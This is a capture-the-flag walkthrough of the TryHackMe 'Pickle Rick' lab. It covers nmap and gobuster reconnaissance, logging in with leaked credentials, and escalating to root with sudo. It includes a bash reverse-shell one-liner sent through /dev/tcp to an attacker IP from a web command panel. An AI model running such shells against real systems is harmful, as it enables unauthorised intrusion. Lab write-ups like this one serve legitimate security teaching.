📓
Pentesting
  • Writeups
  • HackTheBox
    • Easy Machines
      • Beep Writeup
      • Shocker Writeup
      • Lame Writeup
      • Jerry Writeup
      • Legacy Writeup
      • Blue Writeup
  • TryHackMe
    • Walkthroughs: Easy
      • CC: Steganography
      • Cryptography for Dummies
      • Cross-site Scripting
      • SQL Injection Lab
      • SQL Injection
      • ZTH: Web 2
      • SSRF
      • XXE
      • Authenticate
      • Injection
      • Blaster
      • The Cod Caper
      • Hardening Basics Part 1
      • What the Shell?
      • Game Zone
      • Upload Vulnerabilities
      • Bolt
      • Erit Securus 1
      • CC: Pentesting
      • JavaScript Basics
      • OverPass 2 - Hacked
      • Linux: Local Enumeration
      • Ice
      • Linux Backdoors
      • Avengers Blog
      • DNS in Detail
      • Putting it all together
      • Kenobi
      • Common Linux Privesc
      • Network Services 2
      • Network Services
      • The Hacker Methodology
      • The Find command
      • HTTP in Detail
      • Web Fundamentals
      • How Websites Work
      • Introductory Networking
    • Challenges (CTF): Easy
      • VulNet: Roasted
      • VulNet: Internal
      • Git Happens
      • Kiba
      • VulNet: Node
      • Memory Forensics
      • Smag Grotto
      • Investigating Windows
      • Cat Pictures
      • Juicy Details
      • Anthem
      • Tony The Tiger
      • Jack-of-All-Trades
      • JPGChat
      • Blueprint
      • All in One
      • Gotta Catch'em All
      • Mustacchio
      • Break Out The Cage
      • HeartBleed
      • Poster
      • Madness
      • Source
      • Thompson
      • Library
      • Magician
      • Anonforce
      • Dav
      • GLITCH
      • Fowsniff CTF
      • Team
      • H4cked
      • Easy Peasy
      • ColddBox: Easy
      • Archangel
      • Cyborg
      • Chocolate Factory
      • Brute It
      • Year of the Rabbit
      • ChillHack
      • Gaming Server
      • Brooklyn Nine Nine
      • Wgel CTF
      • Tomghost
      • ToolsRus
      • Skynet
      • Startup
      • Agent Sudo
      • Lian-Yu
      • OhSINT
      • Overpass
      • Crack The Hash
      • Ignite
      • Inclusion
      • Bounty Hunter
      • LazyAdmin
      • RootMe
      • Pickle Rick
      • Basic Pentesting
      • Simple CTF
  • Crackmes.one
    • 1 Difficulty Rating
      • easyAF
      • Easy Keyg3nme
Powered by GitBook
On this page
  • Reconnaissance
  • Enumerate
  • Port 80
  • Privilege Escalation

Was this helpful?

  1. TryHackMe
  2. Challenges (CTF): Easy

Pickle Rick

PreviousRootMeNextBasic Pentesting

Last updated 3 years ago

Was this helpful?

Reconnaissance

Lets start with a initial nmap scan to find open ports 

nmap -Pn 10.10.249.44

Detailed Nmap Scan :

Command Breakdown:

  • (-sV): Service version

  • (-sC): Default nmap scripts

  • (-p): Specifying ports 22,80

  • (-oN nmap): Saving it into a files called nmap

nmap -sC -sV -p 22,80 -oN nmap 10.10.249.44

Enumerate

Port 80

Lets visit the website and look at the source code

Lets add this to our notes, I personally use gedit on the kali virtual machine and then transfer all of it to "OneNote" on my host machine and organize it. To use gedit: gedit <name of file>

gedit notes

Now lets visit robots.txt, usually we find something interesting on this page like hidden directories or even sometimes passwords.

This looks interesting, it could probably be a directory, but I tested it and it was not, so it could be a password, so lets save it in our notes.

Now lets run Gobuster to see if we can find hidden directories

Command Breakdown:

  • (-w): Specifying wordlist

  • (-u): Specifying URL

  • (-x): Specifying extensions

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.249.44 -x txt,php,html

/login.php and /portal.php were the same page as /portal.php redirects us to /login.php

/assets had some Javascript and CSS files which did not look like there were going to help us exploit this machine.

Now we found ourselves a login page

And if we look at our notes, we have a username and a possible password, lets try using them to login.

And we got in!!

We have a command panel where we can run some commands, lets explore it.

Running lsgives us some files present in the current directory

Lets try reading those files

cat Sup3rS3cretPickl3Ingred.txt

And.... the command is disabled, so what can we do here, if we try different commands we can see that many commands are allowed but cat is not allowed. After a lot of searching I found a command that gave us reverse shell on the server.

bash -c 'exec bash -i &>/dev/tcp/10.13.8.64/1234 <&1'

And now we can read the contents of Sup3rS3cretPickl3Ingred.txt.

cat Sup3rS3cretPickl3Ingred.txt

This is answer for the first question

Now lets enumerate the machine and find a way to get root

Privilege Escalation

While looking around I found the second ingredient which is the second answer.

Now lets try to become root to cd into the root directory as I think the final ingredient is hidden there, lets run the command sudo -l to see if we can files as other users.

sudo -l

We are allowed to run ALL, so lets try switching users to root using the command su

sudo su

And we are root! We can also see the 3rd and final ingredient in the root directory